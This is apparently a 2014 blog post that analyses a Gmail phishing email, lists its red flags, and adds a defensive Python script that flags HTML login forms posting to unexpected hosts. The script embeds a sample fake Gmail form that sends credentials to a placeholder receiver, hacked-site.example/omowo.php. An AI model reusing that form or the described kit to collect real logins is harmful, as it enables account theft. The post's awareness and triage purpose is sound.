So the phish still lives. I'd like to call it a 419, but this one hits closer to home, the reason being the choice of sender name:
MakOtieno Stephen <abbastephen13@g
How it was all meant to go down:
- Send the e-mail.
- Get me to open an attachment that tells me to log in to Gmail to read my transaction details.
- Submit my details to his remote PHP script, which mails them back home (to him) and then redirects me to the real Gmail as if nothing happened.
Where it fell apart:
- My bank doesn't use Gmail.
- Attachments from them don't come as ZIP files.
- This particular mailing address is not the one they send to.
Nothing much to say about the phish itself; it is all about getting your attention. The e-mail was almost perfect for a non-IT person.
The attachment is a ZIP file and it displays nicely in Gmail. Before opening the ZIP file, it is important to ask:
- Would your bank attach statements like that?
- The ZIP file contains an HTML file; does your bank really do that?
- Would your bank, with all its technological investment, send you a statement from a Gmail account rather than a company account? Is that even realistic?
- Is this the e-mail address you signed up for internet banking with?
Well, oh well. Red flags get them caught.
Let's take a look at the con without letting it hurt us.
Opening up the ZIP and the HTML, we see the wonders: a Gmail phishing page, no surprise there. Let's also find where it phones home after phishing.
On checking the site a bit, I notice that omowo.php receives the login details that were filled in and then redirects to Gmail. Seeing that it is a classic phish, I did the check through a proxy so that none of my current sessions were exposed; no sessions there. The long and short of it: what it ended up getting from me was a blank form. The site had been hacked before this phishing receiver page was uploaded to it.
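The triage step above (open the HTML, find the form, see where the credentials get posted) is easy to script so it can be run against a suspect attachment without ever rendering the page in a browser. The following is an added example, not code from the original post: it parses an HTML file with the standard library, collects every form that carries a password field, and flags any whose action points somewhere other than the hosts the page claims to belong to. The sample HTML and the host `hacked-site.example` are constructed placeholders standing in for the kit described here; the receiver script name `omowo.php` is the one from the post.

```python
"""Triage an HTML attachment from a suspected phish: report where each
credential form posts. Added example, not the original post's code; the
sample page below is constructed to resemble the kit described (a fake
Gmail login whose form posts to a remote omowo.php)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; hacked-site.example is a placeholder host.
SAMPLE_HTML = """
<html><body>
<h1>Sign in to Gmail to view your statement</h1>
<form method="POST" action="http://hacked-site.example/omowo.php">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""


class FormExtractor(HTMLParser):
    """Collects every <form> with its action and the input fields inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser already lower-cases tag and attr names
        if tag == "form":
            self._current = {"action": attrs.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(
                {"type": attrs.get("type", "text"), "name": attrs.get("name", "")}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_forms(html, expected_hosts):
    """Return one finding per form that collects a password and posts it to a
    host outside expected_hosts. A relative action (e.g. "omowo.php") has no
    hostname, so it is flagged too: it posts to wherever the page is hosted,
    which is never the real login provider for a page sent as an attachment."""
    parser = FormExtractor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        has_password = any(i["type"] == "password" for i in form["inputs"])
        host = urlparse(form["action"]).hostname or ""
        if has_password and host not in expected_hosts:
            findings.append(
                {
                    "action": form["action"],
                    "host": host,
                    "fields": [i["name"] for i in form["inputs"] if i["name"]],
                }
            )
    return findings


if __name__ == "__main__":
    # A page claiming to be Gmail should only ever post to Google's login hosts.
    for f in triage_forms(SAMPLE_HTML, {"accounts.google.com", "mail.google.com"}):
        print(f"credential form posts to {f['host'] or '(relative)'} "
              f"via {f['action']}; fields collected: {f['fields']}")
```

Run it against the extracted HTML instead of `SAMPLE_HTML` to get the receiver URL and the field names the kit harvests, which is exactly what you want to hand to the hosting provider of the compromised site and to your own mail filters.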
Hopefully you can now catch a phish before the phisherman gets the credentials. As we close 2014, don't get phished. If you have been phished and have a recovery method, recover your account and change your password, then be careful about what comes in.
The actual phishing page can be downloaded here for researchers:
With your Gmail account an attacker can control your Android device(s), even erase them. Still think this is harmless?